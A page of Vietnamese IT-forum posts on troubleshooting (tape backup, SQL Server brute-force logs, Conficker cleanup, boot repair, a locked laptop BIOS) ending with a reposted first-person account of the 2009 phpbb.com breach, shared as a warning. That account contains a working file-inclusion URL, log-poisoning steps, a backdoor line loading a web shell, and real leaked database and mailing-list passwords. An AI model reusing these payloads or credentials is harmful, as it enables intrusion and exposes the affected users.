Messages posted by: livemotion

Hi All,

- Công mới tẩu về con PowerVault TL2000 - Dell loại Tape backup. Giao mình config nhưng mình có kinh nghiệm về dòng Tape backup.
- Anh nào có kinh nghiệm hay tài liệu thì chia sẻ với mình với nhé.

Cheers.

Đúng là cái em đang cần. Em sẽ từng bước thực hiện. Thanks Anh nhé.

Mạng nội bộ mình có chạy server Database bằng SQL 2005. Sáng nay xem log phát hiện 1 dãy IP đang cố gắng Attack vào server, mình có mở Port 1433 trên server để chạy dịch vụ bên ngoài.

Log:
Code:

03/24/2009 23:02:31,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:30,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:29,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:28,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:27,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:24,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:23,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:22,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
03/24/2009 23:02:21,MSSQL$OFFICEDB,Failure Audit,Login failed for user 'sa'. [CLIENT: 222.73.204.107],Logon,3221243928,,
...............
................
................
..................

IP Attack:
Code:

* IP of China:
222.73.204.107
220.80.48.129
222.187.221.203
222.134.135.81
222.187.220.73
219.150.252.21
202.102.245.95
222.187.220.102
* IP of Spain: (Out blacklisted)
94.127.188.130

Mình dò ra được các IP này bị ghi nhận là Spam, bot....
http://www.infiltrated.net/blacklisted

- Tạm thời mình đã khóa dãy IP này không cho truy cập vào LAN trên firewall. nhưng mình nghĩ đây không là giải pháp kiện toàn, anh em nào có kinh nghiệm thì giúp mình cách khắc phục và phòng chống nhé.

Thanks.
smilie

Nói rõ hơn được không bạn ?.

Cách này làm rất hiểu quả, thanks nhé.

Code:

Sáng giờ mình làm theo cách này cho 4 máy ... giờ chưa thấy bị lại nên lên đây chia sẻ lại để mọi người thử luôn ...
1. Lên : http://www.microsoft.com/downloads/details.aspx?FamilyId=2996b9b6-03ff-4636-861a-46b3eac7a305&displaylang=en , down bản vá của microsoft về !
2. Tắt system restore, update phần mềm anti virus mới nhất (mình xài AVG free). Vô safemode , scan virus, sau khi scan xong thì chạy bản vá của microsoft down về lúc nãy.
(hoặc có thể dùng thằng "FixDownadup" của symantec hoặc "Malicious Software Removal tool" của microsoft, đều quét trong safemode)
3. Cài thằng Registry booster cho nó dọn dẹp lại registry.
Chúc thành công, mong là không bị lại ... bị thằng này cực quá !

- Mình đang dính con này:
Faulting application name: svchost.exe, version: 5.1.2600.2180, time stamp: 0xAcGenral.dll
Faulting module name: 5.1.2600.3163, version: 000116e2, time.

Mình sẽ thử các cách của các bạn xem sao. Theo mình biết thì con này được phát hiện vào tháng 12 vừa rồi.

Ý của bolzano_1989 rất hay mình, mình sẽ thử theo hướng này xem sao, nếu tìm ra được mình sẽ PM cho anh em biết.

Bạn đã thử mở CMD và DIR thử ổ E xem nó có báo lỗi ko.
Nếu không boot bằng Hirent Boot và vào DOS liệt kê xem có báo lỗi ko.

duyngochva wrote:

Máy tính em xài HĐH Windows SP2. Ổ cứng định dạng FAT32 .Gần đây máy tính xuất hiền thông báo lỗi

windows was unable to save all the data for the file. E:goes.bct. The data has been lost. this error may be caused by a failure of your computer hardware connection. Please try to save this file elsewhere. Và không cho tạo thư mục hay lưu trữ file trên ổ đó nữa.

Em đã thử cop hết dữ liệu sang ổ khác và format lại rồi cả sửa Bad nữa nhưng nó chỉ ổn được một ngày rồi sau đó lại bị tiếp. Các bác chỉ giúp em các khác phục với nhé.

Xin chân thành cảm ơn các bác nhiều lắm

Theo mình nghĩ bạn nên format lại toàn bộ ổ cứng. Dùng Fdisk để format.
Nếu muốn chuyển từ Fat32 thành NTFS bạn có thể convert trong window luôn:

Start -> Run -> CMD
CONVERT [tên ổ Đĩa]: /FS:NTFS
Ví dụ: muốn convert ổ C
CONVERT C: /FS:NTFS
Có thể tham khảo thêm CONVERT /?

FaL wrote:

livemotion wrote:

Bạn thisgifts nếu bạn ở TPHCM thì nhắn mình nhé. Có cơ hội mình mời bạn uống cà phê và nói chuyện. mình đã lưu và nhá máy cho bạn.

Ôi trời ạ, người ta có lòng tốt giúp bạn mà bạn chỉ nhá máy rồi lưu lại ... Tui cũng ko hiểu nổi.

Không đùa đâu bạn, nhưng dạo này mình chưa rảnh vì nhiều nguyên nhân. Nên mình chỉ nhắn vậy.Thông cám nhé! smilie

Àh, nếu bạn thisgifts có thể viết một bài hướng dẫn ngắn thì hay quá.

Một lần nữa cám ơn bác conmale và các thành viên đã hổ trợ tích cực cho mình. Bác commale nói đúng, lúc đầu cũng nghĩ như bác, nhưng vì nhờ nên mình không tiện hỏi thêm, thanks bác. Website các thành viên post lên mình đã vào và nhiều trang khác nữa (trong nước và ngoài nước. Bao gồm có thể reset password cho HDD (chỉ cho ATA) nhưng không khả quan lắm.
Sau một ngày tìm kiếm và dùng các biện pháp thì mình co một vài chia sẻ sau đến các thành viên.

Các bước mình thực hiện:
1/ Về Bios:
- Dùng Hirrent Boot để crack password Bios không thành công.
- Tìm kiếm trên google phát hiện có phiên bản mới. Đem về flash có 3 phút là okies. Chạy good. Ai bị password Bios giống mình thì nhắn để mình sent cho.
Boot bằng DOS hổ trợ USB rùi flash.

2/ Về ổ cứng.
- Gỡ ổ cứng tháo lắp vào Máy để bàn (Desktop) hệ điều hành nhận (ko hiện ra ổ đĩa ở computer chỉ hiện trong Disk management), nhưng không cho can thiệp bằng bất cứ động tác nào.
- Gỡ đem qua laptop khác báo ko nhận.
- Gắn ổ cứng ngoài cũng cùng một kết quả (ko nhận).
- Dùng các tool trong Hirent boot để định dạng và đọc vẫn không được (fail disk).
=> Vậy là pó tay. Các thành viên đọc thấy mình làm thiếu bước nào thì chỉ nhé smilie

Bạn thisgifts nếu bạn ở TPHCM thì nhắn mình nhé. Có cơ hội mình mời bạn uống cà phê và nói chuyện. mình đã lưu và nhá máy cho bạn.

Vấn đề của mình là nhờ người khác mua và xách về, chứ không tận mắt ở đó nên khó trả lời những câu hỏi của bác conmale, với lại mình cũng không tin bạn mình có thể nói sạo mình.

Dòng boot đầu tiên nó ghi vậy nè bạn:
insydelH20 version: v1.34
BIOS buil Date: 04/28/2006

Code:

Bạn để ý nhìn kĩ lại xem Bios máy bạn hiệu gì ( kiểu như Phoenix , Award .. )

Bác conmale và bolzano_1989 nói đúng, nhưng vấn đề ở đây là mình nhờ mua và bạn mình xách tay về. Lúc mua thì nó vẫn chạy bình thường. Khi hải quan giữ lại để kiểm tra và về đến việt nam thì bị tình trạng này.
Mình đã hỏi thì có 2 vấn đề ở đây:
- Khi mua laptop mới thì qua hải quan chỉ quét và cho qua.
- Khi mua hàng cũ thì bị giữ lại kiểm tra bên trong. Còn vụ đặt password này thì mình pó tay.

Anh em có cách nào giúp mình không?. Cứu với.

Mình có người quen mua cho cái máy Accer (Laptop - second hand) bên australia. Lúc xách về việt nam, nhân viên hải quan của australia kiểm tra, khóa Bios và Hdd bằng password (cái này ko thông báo cho bạn mình).
Lúc về việt nam mở ra mới biết bị khóa. Không truy cập vào Bios và HDD. Vào Bios nó đòi user, chuyển qua ổ cứng cũng đòi password mới vào win. Anh em nào có cách phá pass hoặc đã gặp qua giúp mình với.

Thông số của nó:
Code:

Tên máy: Accer aspire s315
ổ cứng: primary Master Hitachi HTS541680J9Sset

Vậy là bạn đặt web tại công ty. Có dùng firewall gì không bạn?.

Code:

--> ngoài ra trên máy chủ server em còn chạy thêm 1 trang web TMDT ( viết = PHP & mySQL do em thiết kế nữa hi`hi`:p ).

Không biết bạn bonmatk đã khắc phục được sự cố chưa. Nếu rồi thì thông báo cho anh em biết nhé.

Chà vấn đề các bạn nói với nhau còn căng hơn máy bị dính con virus. Khả năng bạn bị nhiễm mã đọc rất cao. Bạn đang xài chương trình diệt virus gì vậy?.Bạn thử cài chương trình Kaspersky đi. Mình lúc trước cũng bị như bạn nhưng bị kéo vào một trang của china. Chúc may mắn nha bạn.

Dowload thằng này về quét, nó cũng good lắm:
http://www.noadware.net/?hop=newbr2

PS: Bạn cần tích cực hơn, TMD và các thành viên đều muốn giúp, nhưng bạn phải tích cực, làm vậy các thành viên mới thấy sự giúp đỡ của họ có ích cho bạn chứ.

Bạn vào trang này tìm hiểu thêm đi, nói rất chi tiết: https://www.opendns.com
Còn vấn đề "Mình hiểu là nếu Ip động thì trong lần reset máy tiếp theo thì sẽ là 1 Ip khác." mỗi lần reset máy lại là nhận ip mới còn tùy thuộc vao DHCP sever.

Nạp kiến thức thêm nha bạn.

Nguyên nhân gây ra lỗi này thường do một trong những tập tin khởi động của Windows bị lỗi hoặc virus xóa tập tin Ntldr. Các tập tin khởi động của Windows bao gồm Ntldr, Ntdetect.com, Boot.ini. Để fix bạn có thể làm theo cách sau:

Bạn thực hiện như sau: cho đĩa cài Win vào ổ CD.
Vào CMOS chỉnh lại boot bằng ổ CD ROM
- Để vào màn hình thiết lập thông tin trong CMOS tùy theo dòng máy chúng ta có các cách sau:
* Khi khởi động máy, đối với các mainboard thông thường hiện nay dùng phím DELETE. Trên màn hình khởi động sẽ có dòng chữ hướng dẫn: Press DEL to enter Setup.
* Đối với dòng máy Compaq, HP dùng phím F10. Trên màn hình khởi động sẽ có dòng chữ hướng dẫn: F10 = Setup.
Đối với dòng máy DEL dùng phím F2. Trên màn hình khởi động sẽ có dòng chữ hướng dẫn F2: Setup.
Tùy từng loại mainboard cách bố trí màn hình thiết lập CMOS khác nhau, các chức năng với tên gọi cũng khác nhau.
Chọn dòng BIOS FEATURES SETUP (ADVANCED CMOS SETUP), tìm dòng First Boot Device chỉnh lại là CD ROM, sau đó nhấn F10 để lưu lại\yes khởi động lại máy.
- Khởi động máy với đĩa CD cài đặt Windows. Nhấn phím bất kỳ khi xuất hiện thông báo: Press any key to boot from CD.

- Trong màn hình Welcome to setup, nhấn phím R (Repair) để khởi động Recovery Console (RC).

- Nếu hệ thống cài đặt nhiều hệ điều hành (HĐH) khác nhau, chọn HĐH bị lỗi cần khắc phục (lưu ý: nếu nhấn Enter khi chưa chọn HĐH, chương trình sẽ tự khởi động lại máy).

- Gõ mật khẩu của tài khoản Administrator.

- Tại dấu nhắc của RC, gõ dòng lệnh:

copy E:\I386\ntldr C:\

copy E:\I386\ntdetect.com C:\

(với E: là ổ CD-ROM, C: là phân vùng hệ thống) - Lưu ý là đường dẫn trên có thể sẽ khác tùy thuộc vào máy của bạn

- Chọn Yes (Y) nếu xuất hiện hộp thoại xác nhận việc chép đè tập tin cũ.

- Gõ lệnh Exit để khởi động lại hệ thống.

Lưu ý:
- Để sử dụng RC bạn phải đăng nhập với tài khoản thuộc nhóm Administrators.
- Thông tin hướng dẫn được thực hiện trên hệ thống Windows XP. Với Windows 2000, trong màn hình Welcome to setup, bạn nhấn phím R (Repair) để sửa lỗi Windows và chọn C để khởi động RC.

Code:

http://www.milw0rm.com/exploits/6897
 http://www.milw0rm.com/exploits/6461
 http://www.milw0rm.com/exploits/3459
 http://www.milw0rm.com/exploits/2554
 http://www.milw0rm.com/exploits/2466
 http://www.securityfocus.com/archive/1/357172
 http://www.securityfocus.com/archive/1/492259
 http://www.securityfocus.com/archive/1/394803
 http://www.securityfocus.com/bid/7758
 http://www.securityfocus.com/bid/11456
 http://www.securityfocus.com/bid/6882
 http://www.securityfocus.com/bid/11455
 http://www.securityfocus.com/bid/10407
 http://www.securityfocus.com/bid/11449
 http://www.securityfocus.com/bid/8119
 http://www.securityfocus.com/archive/1/462562
 http://www.securityfocus.com/bid/9848
 http://www.securityfocus.com/bid/6885
 http://www.securityfocus.com/bid/10505
 http://www.securityfocus.com/bid/9855

Nguồn: http://quantripro.com/forum/showthread.php?p=3982#post3982

Theo mình nghĩ các mã nguồn thường hay có bug, nếu ta xài thì chịu khó cập nhật các bảng vá lỗi của nó là ok.

Thông tin này có thể có ích cho bạn.

Website mã nguồn mở http://www.phpbb.com đã bị hack vào tuần vừa rồi.
Đây là thông báo lỗi từ quản trị Website:

Maintenance

We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself.

You can download phpBB here: http://www.ohloh.net/p/phpbb

You can get support at the temporary support forums or on IRC: chat.freenode.net #phpbb

– the phpBB team

Giao diện website bị lỗi:

http://www.phpbb.com/index.php

Đây là miêu tả các bước hack của hacker:

http://www.milw0rm.com/exploits/7778 I then remembered that phpbb.com was running PHPlist and went looking through my email to find the link to the script’s location. So I went to phpbb.com/lists and sure enough they were running a vulnerable version. Next I enabled my favorite program proxy program and tried http://www.phpbb.com/lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../etc/passwd and sure enough it included the etc/passwd

http://hackedphpbb.pastebin.com/f70f8bcaf
http://rapidshare.com/files/192159914/etc.txt

So I moved on to /etc/httpd/conf/httpd.conf
http://rapidshare.com/files/192163061/httpd.txt
http://hackedphpbb.pastebin.com/d29d8d4c7

And eventually found my way to their error log /home/logs/phpbb.com/error_log. After a little looking I figured out that their forums were running off /home/virtual/phpbb.com/community/ well it has been known for some time that you can include code in the error log. So I wanted to run some code, well in PHPBB3 the avatars are located in a folder called /home/virtual/phpbb.com/community/images/avatars/upload and your avatar is called (secret hash)_userid.jpg. But I didn’t know what the secret has was to include my picture (that had my own code in it) so by using the error log I injected code
And figured out that their hash is f51ee61fe7a83fdf72780912bced0855. So now every time I want to upload run code against the server I can include this: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg

So my first avatar was something simple and I wanted to see if phpbb kept their config file in plain text so cat /home/virtual/phpbb.com/community/config.php and sure enough, its in plain text.
$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5';
$table_prefix = 'community_';

While I was at it I checked out the config for PHPlist and it was also in plain text:
$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3';

So I started running commands and found out that I can upload a php text file on the forums and by finding where the path it was stored I was able to get around their 14kb restrictions on avatars and a lot easier than editing images with edjpgcom. So doing a mysql dump of the phplist_admin table it showed in plain text that the password for the one admin account was phpbb_n3ws and the login was phpBB. Wow I am shocked no one brute forced this. So I login and see what I can come across, wow 400,000 registered emails, I’m sure that will go quick on the black market, sorry people but expect a lot of spam. After trying to modify the files that were stored in PHPlist I gave up and moved on to the forums. But not before dumping the PHPlist emails here: http://rapidshare.com/files/192305758/out.txt

On the phpbb forums it states it has 200,000 members, but due to them constantly getting spammed they have well over 400,000 accounts. I started dumping the community_users table with their user_id, username and user_password. PHPBB stores their user’s passwords in unsalted md5 and their admin’s passwords in some funky hash. But if you run your own forum and are an admin you can have your forums create the hash, and then you do an mysql update to one of the admin account’s and your in. Or if you change their password to yours you can use the recover password function. More to come from this later.

So I wrote a script that submits via curl, the md5 hash to a website and then stores the successful result in my own mysql database. The total accounts cracked are: 28635. I could have continued cracking but it was getting boring. Here is a sql file of the cracked passwords. Warning, some of the user name’s aren’t right as I had to remove ticks and quotes for it to run in my script, so I included their user id so you can check their proper login name.
http://rapidshare.com/files/192304153/phpbb_users.sql

In gaining access to the admin panel of the forums, I was able to read staff forums and come across some interesting posts. I will share some with you.

List passwords:
TO try and make this easier, below is a list of the mailing list passwords I had, please update and add any others that you have

captcha-commits@lists.phpbb.com 54a946c47dd434b2
catdb-commits@lists.phpbb.com 6f543db8f086e11f
convertors-commits@lists.phpbb.com c192b68baacc8842
documentation-commits@lists.phpbb.com f85ffcdf9262420c
easymod-commits@lists.phpbb.com 5db5bf75be85191b
kbase-commits@lists.phpbb.com 7c843188ed2f6021
modteam-commits@lists.phpbb.com 533aeefe56bfa30c
prosilver-commits@lists.phpbb.com 859785a9cc724e03
website-commits@lists.phpbb.com 3c79b9864ae5ce43
phpbb-honey-commits@lists.phpbb.com 7e9563750650e4c4
st-tool-commits@lists.phpbb.com 534d4a9b74bb77aa
iit-track-commits@lists.phpbb.com 8f318ffd3a2067c8
packagemanager-commits@lists.phpbb.com 81657892dddafdca
moddocs-commits@lists.phpbb.com 85c837b7f78e5435

Told you they were random Meik

edit by dhn: added website-commits
edit by tm: added phpbb-honey-commits, st--tool-commits, iit-track-commits.

8kg;rt7Xykjq

That password should work for all mailing lists on code.phpbb.com.

Emergency contacts and irc info:
http://hackedphpbb.pastebin.com/f1399b3e8

And then I remembered that the admin panel allows you to dump tables. So I dumped the users table which is accessible here:
http://rapidshare.com/files/192261517/backup_sql.gz

Next I enabled php in template files and added this bit of code to one of the templates:
$ip=$_SERVER['REMOTE_ADDR']; if($ip == "x.x.x.x"){include("/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f");}

Which happened to be a shell, R57shell actually. I then searched for a writable directory and created a php file and wrote the source code to that file. I cleaned up the template and settings and logs and left the forums to run the way they were.

After searching around using the shell I came across the Blog settings:
define('DB_NAME', 'wordpress'); // The name of the database
define('DB_USER', 'blog'); // Your MySQL username
define('DB_PASSWORD', 'htsCCvyCnt5jPYMx'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

And now it comes to an end, you may ask why did I do this? For fun mainly, but what I would like to suggest to the team at phpbb is this. If you are going to run third party scripts, either integrate them or keep up to date on their patches. (even though the patch wasn’t released for 2 weeks). Also don’t allow admin’s to recover their passwords, they should have to contact another admin. Another item, doesn’t keep plain text files of passwords or in the database plain text passwords.

I know this isn’t the best read, but it is very hard to look back on everything you did over the course of a few weeks. But hopefully I can now sleep better knowing that I am not worrying about the next way to break in.

Đây chính là Blog của hacker đăng bài:

http://hackedphpbb.blogspot.com/

NGUỒN: http://quantripro.com/forum/showthread.php?p=3967#post3967